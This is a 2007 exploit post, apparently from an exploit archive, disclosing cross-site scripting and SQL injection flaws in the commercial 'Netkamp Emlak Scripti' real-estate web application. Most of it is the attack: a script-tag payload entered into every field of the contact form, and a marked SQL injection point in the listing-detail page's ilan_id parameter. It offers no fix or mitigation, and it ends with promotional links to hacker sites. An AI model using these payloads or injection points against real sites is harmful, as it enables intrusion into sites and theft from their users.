Home / os / win10

netkamp-sql.txt

Posted on 30 September 2007

Netkamp Emlak Scripti XSS & Sql Ýnjections Vulnerability

#Software: Netkamp Emlak Scripti
#download: not free(350 YTL) sale: http://www.netkamp.com/net_emlak.asp
#demo: http://netemlak.netkamp.com/
#Found By: GeFORC3 ( G3 )


#Exploit & example :

-----------------------------------------------------------------------
#XSS:

http://www.site.com/script_path/iletisim.asp

write to xss code in script's tex box

expample:

Ýletiþim Formu(contact form)

Adýnýz: "><script>alert("G3");</script>
Soyadýnýz: "><script>alert("G3");</script>
E-Mail:  "><script>alert("G3");</script>
Konu: "><script>alert("G3");</script>
Mesajýnýz: "><script>alert("G3");</script>

Press to "gönder"(send) button.

This xss works on "Netkamp Emlak Scripti" script's contact page
-----------------------------------------------------------------------
#Sql Ýnjections

http://www.site.com.com/script_path/detay.asp?ilan_id=[SQL]


-----------------------------------------------------
WwW.GeFORC3.ORG  |  WwW.HeykirBlog.Org  |  WwW.NetKaBus.CoM

 

TOP